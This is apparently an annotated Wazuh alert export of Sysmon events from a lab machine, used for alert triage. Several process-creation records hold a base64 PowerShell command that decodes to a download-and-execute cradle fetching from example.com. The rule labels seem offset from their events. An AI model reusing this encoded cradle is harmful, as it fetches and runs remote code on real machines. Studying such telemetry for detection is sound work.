data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:51.7105256Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283231 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:51.697
ProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00}
ProcessId: 10808
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_is1i0e3l.l1c.ps1
CreationUtcTime: 2025-04-24 22:36:51.697
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:51.697 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd02-680a-0b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_is1i0e3l.l1c.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:51.697 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 41 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534229.1275602 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:53.8027624Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283265 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:52.626
ProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00}
ProcessId: 13712
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00}
ParentProcessId: 10808
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:52.626 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd04-680a-0f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 45 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534229.1283673 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:54.0658636Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283266 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:54.027
ProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00}
ProcessId: 13712
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tav0px12.umw.ps1
CreationUtcTime: 2025-04-24 22:36:54.027
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:54.027 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd04-680a-0f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tav0px12.umw.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:54.027 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 42 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534229.1286442 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:57.6945948Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283300 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:55.050
ProcessGuid: {94294ddc-bd07-680a-160b-000000000e00}
ProcessId: 5848
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00}
ParentProcessId: 13712
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:55.050 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd07-680a-160b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5848 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 46 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534229.1294509 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:57.8932258Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283301 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:57.856
ProcessGuid: {94294ddc-bd07-680a-160b-000000000e00}
ProcessId: 5848
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rxxe3nx5.d3c.ps1
CreationUtcTime: 2025-04-24 22:36:57.856
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:57.856 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd07-680a-160b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5848 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rxxe3nx5.d3c.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:57.856 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 43 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534229.1297274 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
